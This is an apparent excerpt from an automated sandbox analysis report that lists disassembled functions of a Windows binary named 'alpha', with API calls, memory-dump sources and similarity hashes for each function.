                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$CurrentDirectorytowupper
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1403193329-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 803eba6ff31649e7235b39e315db9048ff9d9c1ecb4f78fabd3f92a2c075e05e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D51A327A0568A85FB24AF20D8406BEB6B0FF44758FC58177CE0F876A4EFBC95449720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15191C0 Relevance: 7.6, APIs: 5, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00007FF7D151921C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7D15193AA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1518B20: wcsrchr.MSVCRT ref: 00007FF7D1518BAB
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1518B20: _wcsicmp.MSVCRT ref: 00007FF7D1518BD4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1518B20: _wcsicmp.MSVCRT ref: 00007FF7D1518BF2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1518B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D1518C16
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1518B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7D1518C2F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1518B20: wcschr.MSVCRT ref: 00007FF7D1518CB3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D152417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7D15241AD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7D15192AC), ref: 00007FF7D15230CA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523060: SetErrorMode.KERNELBASE ref: 00007FF7D15230DD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D15230F6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523060: SetErrorMode.KERNELBASE ref: 00007FF7D1523106
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcsrchr.MSVCRT ref: 00007FF7D15192D8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D1519362
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7D1519373
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3966000956-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5708ded549f549a136fb02a5be9eff6c413d59be5cd05def112f5a69c71b855a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2751A322A0968B85FB62AF11D8502BDB3A0FB49B44FC55036DA0F47BA4DF7CE591C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1512A30 Relevance: 7.6, APIs: 5, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$_setjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3883041866-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2124138010038f54997149509e1e503f99574355f749c6d48a30454d44694652
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC51413260878A8AFB619F21D8503EDB7A4FB45748FD04136E64E87A68DFBCD644C710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D151B49C Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D151B4BD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D15206D6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D15206F0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D152074D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15206C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D1520762
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D151B518
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF7D151B58B
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: ELSE$IF/?
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3223794493-1134991328
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: cc8a4a6b2d6907aa8cff5e1f0c718eb4bbe54af75f128201aeb076963007bb56
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63414822A0D64B81FF56BB64E4112BDB2A1AF55740FD64437D50F472B6EEBCE4808370
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153E3E8 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1532185241-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2b400c0670d811b645aa9162efda08d288951c5fee55cb151bdfd21ee0db1c67
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8741D232A0475B87F754AB21E4455BDBAA1FB88B40FD54536EA0B437A0CFBCE851C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1514FE8 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3588551418-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 1a558f671a92b96693ebf89c1e29043931029e638ba01378ec090483a4cb3d22
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C417C32E1864B8BF714AB51A45427DF761EB85B90FD4403AE64F477B1CEBCE8808B60
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153E558 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ErrorModememset$FullNamePath_wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2123716050-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 7c9794c3b42709582e2906f4433896d7577a283744c57734ed01ad4ec0c06245
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF418032705BCB8AFB729F25D8503EDA794EB49788F844135DA4E4BAA8DF7CD2448710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15165F8 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3114114779-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f759039f9cd1cfd9bfddd1227132d18823009c158c4c77ed351a3d9fbbf04293
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34412832A05B4B8AF700EF65D4502ACB7A5FB48748F954036EA0E93B64DFBCD446C760
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153A73C Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7D1539A82), ref: 00007FF7D153A77A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7D1539A82), ref: 00007FF7D153A7AF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7D1539A82), ref: 00007FF7D153A80E
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7D1539A82), ref: 00007FF7D153A839
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7D1539A82), ref: 00007FF7D153A850
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: QueryValue$CloseErrorLastOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2240656346-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 24fb1166308adf7cb173c2f2dc13eb88e361c0739897424c7a6b547b4dd0a532
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7318D36A18A4682F751AF25E44046DF7A4FB88790FE54136EA4F83774DF7DD8418B20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153D0C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15201B8: _get_osfhandle.MSVCRT ref: 00007FF7D15201C4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15201B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7D152E904,?,?,?,?,00000000,00007FF7D1523491,?,?,?,00007FF7D1534420), ref: 00007FF7D15201D6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7D153D0F9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7D153D10F
